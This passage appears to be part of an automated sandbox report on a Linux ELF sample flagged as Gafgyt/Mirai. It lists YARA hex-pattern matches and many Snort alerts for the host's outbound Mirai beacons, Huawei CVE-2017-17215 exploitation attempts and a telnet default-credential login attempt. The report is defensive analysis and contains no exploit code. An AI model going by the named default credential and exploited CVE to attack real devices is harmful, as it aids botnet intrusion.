Process Memory Space: F00D0B21M4.elf PID: 6212	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x102b:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6213	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x2121:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2135:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2149:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x215d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2171:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2185:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2199:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x21ad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x21c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x21d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x21e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x21fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2211:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2225:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2239:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x224d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2261:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2275:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2289:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x229d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x22b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6213	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x25df:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6219	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x6f1b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f2f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f43:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f57:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f6b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f7f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6f93:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6fa7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6fbb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6fcf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6fe3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6ff7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x700b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x701f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x7033:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x7047:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x705b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x706f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x7083:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x7097:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x70ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6219	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x73d9:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6220	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1b801:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b815:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b829:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b83d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b851:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b865:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b879:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b88d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b8a1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b8b5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b8c9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b8dd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b8f1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b905:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b919:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b92d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b941:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b955:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b969:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b97d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1b991:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6220	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x1bcbf:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Click to see the 38 entries

Snort Signatures

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.49.9.224

Timestamp:	192.168.2.23112.49.9.22438270802839471 11/22/23-08:38:57.481125
SID:	2839471
Source Port:	38270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.16.165

Timestamp:	192.168.2.2395.101.16.16559198802839471 11/22/23-08:38:58.795039
SID:	2839471
Source Port:	59198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.163.197

Timestamp:	192.168.2.23112.126.163.19747042802839471 11/22/23-08:39:18.763055
SID:	2839471
Source Port:	47042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.224.61

Timestamp:	192.168.2.2388.221.224.6159256802839471 11/22/23-08:38:32.852611
SID:	2839471
Source Port:	59256
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.112.253

Timestamp:	192.168.2.2388.198.112.25342492802839471 11/22/23-08:39:47.996437
SID:	2839471
Source Port:	42492
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.196.20.20

Timestamp:	192.168.2.23112.196.20.2035324802839471 11/22/23-08:40:30.988580
SID:	2839471
Source Port:	35324
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.164.250.90

Timestamp:	192.168.2.23112.164.250.9053900802839471 11/22/23-08:39:25.680414
SID:	2839471
Source Port:	53900
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.214.8.128

Timestamp:	192.168.2.2395.214.8.12850286802839471 11/22/23-08:39:06.529656
SID:	2839471
Source Port:	50286
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.167.31

Timestamp:	192.168.2.23112.126.167.3136540802839471 11/22/23-08:39:09.520578
SID:	2839471
Source Port:	36540
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.64.181

Timestamp:	192.168.2.23112.124.64.18137760802839471 11/22/23-08:38:20.072122
SID:	2839471
Source Port:	37760
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.248.50.239

Timestamp:	192.168.2.2388.248.50.23955656802839471 11/22/23-08:39:29.643542
SID:	2839471
Source Port:	55656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.36.64

Timestamp:	192.168.2.2388.99.36.6460326802839471 11/22/23-08:38:26.460745
SID:	2839471
Source Port:	60326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.231.96

Timestamp:	192.168.2.2395.100.231.9641116802839471 11/22/23-08:39:59.816783
SID:	2839471
Source Port:	41116
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.43.190

Timestamp:	192.168.2.2395.101.43.19039292802839471 11/22/23-08:40:04.893645
SID:	2839471
Source Port:	39292
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.147.161

Timestamp:	192.168.2.23112.126.147.16152326802839471 11/22/23-08:38:01.602639
SID:	2839471
Source Port:	52326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.90.184

Timestamp:	192.168.2.2395.216.90.18451394802839471 11/22/23-08:38:40.877405
SID:	2839471
Source Port:	51394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.81.189

Timestamp:	192.168.2.2341.42.81.18935538372152835222 11/22/23-08:40:01.779235
SID:	2835222
Source Port:	35538
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.101.124

Timestamp:	192.168.2.23112.124.101.12439986802839471 11/22/23-08:38:01.608499
SID:	2839471
Source Port:	39986
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.217.35

Timestamp:	192.168.2.2395.163.217.3534330802839471 11/22/23-08:39:49.905994
SID:	2839471
Source Port:	34330
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.131.176

Timestamp:	192.168.2.23197.56.131.17635542372152829579 11/22/23-08:39:23.590260
SID:	2829579
Source Port:	35542
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.169.114

Timestamp:	192.168.2.2395.101.169.11440020802839471 11/22/23-08:40:21.522377
SID:	2839471
Source Port:	40020
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.129.47

Timestamp:	192.168.2.23112.126.129.4736736802839471 11/22/23-08:39:12.817685
SID:	2839471
Source Port:	36736
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.181.75

Timestamp:	192.168.2.2395.101.181.7540926802839471 11/22/23-08:40:27.009412
SID:	2839471
Source Port:	40926
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.185.234

Timestamp:	192.168.2.2395.85.185.23446504802839471 11/22/23-08:40:01.183724
SID:	2839471
Source Port:	46504
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.46.201.145

Timestamp:	192.168.2.2395.46.201.14544216802839471 11/22/23-08:38:00.058354
SID:	2839471
Source Port:	44216
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.103.87.191

Timestamp:	192.168.2.2395.103.87.19148694802839471 11/22/23-08:38:35.843072
SID:	2839471
Source Port:	48694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.33.132

Timestamp:	192.168.2.2395.216.33.13253504802839471 11/22/23-08:38:45.359840
SID:	2839471
Source Port:	53504
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.102.82

Timestamp:	192.168.2.23112.126.102.8245458802839471 11/22/23-08:39:20.641675
SID:	2839471
Source Port:	45458
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0admin) - Source IP: 192.168.2.23 - Destination IP: 197.220.7.249

Timestamp:	192.168.2.23197.220.7.24948948232023433 11/22/23-08:40:09.471073
SID:	2023433
Source Port:	48948
Destination Port:	23
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.68.242.182

Timestamp:	192.168.2.2395.68.242.18257602802839471 11/22/23-08:38:24.791635
SID:	2839471
Source Port:	57602
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.149.206

Timestamp:	192.168.2.2388.99.149.20647606802839471 11/22/23-08:38:50.251015
SID:	2839471
Source Port:	47606
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.136.38.136

Timestamp:	192.168.2.2395.136.38.13644440802839471 11/22/23-08:38:19.602335
SID:	2839471
Source Port:	44440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.107.99

Timestamp:	192.168.2.2395.101.107.9942448802839471 11/22/23-08:39:36.617945
SID:	2839471
Source Port:	42448
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.42.157.24

Timestamp:	192.168.2.2341.42.157.2449582372152835222 11/22/23-08:38:57.907901
SID:	2835222
Source Port:	49582
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.124.34

Timestamp:	192.168.2.2388.198.124.3443116802839471 11/22/23-08:39:57.726493
SID:	2839471
Source Port:	43116
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.164.252.135

Timestamp:	192.168.2.2395.164.252.13544286802839471 11/22/23-08:38:08.738280
SID:	2839471
Source Port:	44286
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.47.67

Timestamp:	192.168.2.2388.99.47.6741498802839471 11/22/23-08:38:35.245045
SID:	2839471
Source Port:	41498
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.139.78

Timestamp:	192.168.2.2395.100.139.7858060802839471 11/22/23-08:38:26.483600
SID:	2839471
Source Port:	58060
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.84.187.77

Timestamp:	192.168.2.2395.84.187.7745690802839471 11/22/23-08:38:42.845032
SID:	2839471
Source Port:	45690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.80.21.3

Timestamp:	192.168.2.2388.80.21.342454802839471 11/22/23-08:38:50.255720
SID:	2839471
Source Port:	42454
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.48.136.107

Timestamp:	192.168.2.23112.48.136.10747028802839471 11/22/23-08:38:49.217606
SID:	2839471
Source Port:	47028
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.25.7.235

Timestamp:	192.168.2.23112.25.7.23532876802839471 11/22/23-08:39:18.858509
SID:	2839471
Source Port:	32876
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.139.78

Timestamp:	192.168.2.2395.100.139.7858486802839471 11/22/23-08:38:40.661519
SID:	2839471
Source Port:	58486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.135.209.173

Timestamp:	192.168.2.23112.135.209.17343298802839471 11/22/23-08:38:46.231038
SID:	2839471
Source Port:	43298
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.51.244

Timestamp:	192.168.2.2395.100.51.24439498802839471 11/22/23-08:38:42.559239
SID:	2839471
Source Port:	39498
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.129.47.98

Timestamp:	192.168.2.2395.129.47.9851350802839471 11/22/23-08:39:25.898768
SID:	2839471
Source Port:	51350
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.130.253.242

Timestamp:	192.168.2.2395.130.253.24257004802839471 11/22/23-08:39:09.701276
SID:	2839471
Source Port:	57004
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.163.29

Timestamp:	192.168.2.2395.101.163.2936026802839471 11/22/23-08:38:28.297876
SID:	2839471
Source Port:	36026
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.65.217.62

Timestamp:	192.168.2.23112.65.217.6251346802839471 11/22/23-08:38:50.054587
SID:	2839471
Source Port:	51346
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.45.28.255

Timestamp:	192.168.2.2341.45.28.25546578372152829579 11/22/23-08:39:28.880184
SID:	2829579
Source Port:	46578
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.161.42

Timestamp:	192.168.2.23112.126.161.4233422802839471 11/22/23-08:39:13.449029
SID:	2839471
Source Port:	33422
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.197.172

Timestamp:	192.168.2.23112.126.197.17240328802839471 11/22/23-08:38:22.216698
SID:	2839471
Source Port:	40328
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.211.189.220

Timestamp:	192.168.2.2395.211.189.22038080802839471 11/22/23-08:38:53.086544
SID:	2839471
Source Port:	38080
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.188.154

Timestamp:	192.168.2.2395.101.188.15445096802839471 11/22/23-08:39:49.694898
SID:	2839471
Source Port:	45096
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.209.219.149

Timestamp:	192.168.2.2388.209.219.14950374802839471 11/22/23-08:38:39.291982
SID:	2839471
Source Port:	50374
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.47.32.218

Timestamp:	192.168.2.23112.47.32.21847328802839471 11/22/23-08:39:53.317709
SID:	2839471
Source Port:	47328
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.166.64.200

Timestamp:	192.168.2.23112.166.64.20041700802839471 11/22/23-08:38:01.589353
SID:	2839471
Source Port:	41700
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.213.226.130

Timestamp:	192.168.2.2388.213.226.13052570802839471 11/22/23-08:38:35.232101
SID:	2839471
Source Port:	52570
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.105.79

Timestamp:	192.168.2.2395.59.105.7949592802839471 11/22/23-08:38:42.892321
SID:	2839471
Source Port:	49592
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.227.33

Timestamp:	192.168.2.2395.100.227.3338088802839471 11/22/23-08:37:53.336291
SID:	2839471
Source Port:	38088
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.193.179

Timestamp:	192.168.2.23112.126.193.17934288802839471 11/22/23-08:39:42.878290
SID:	2839471
Source Port:	34288
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.65.133.205

Timestamp:	192.168.2.2388.65.133.20554074802839471 11/22/23-08:39:09.897420
SID:	2839471
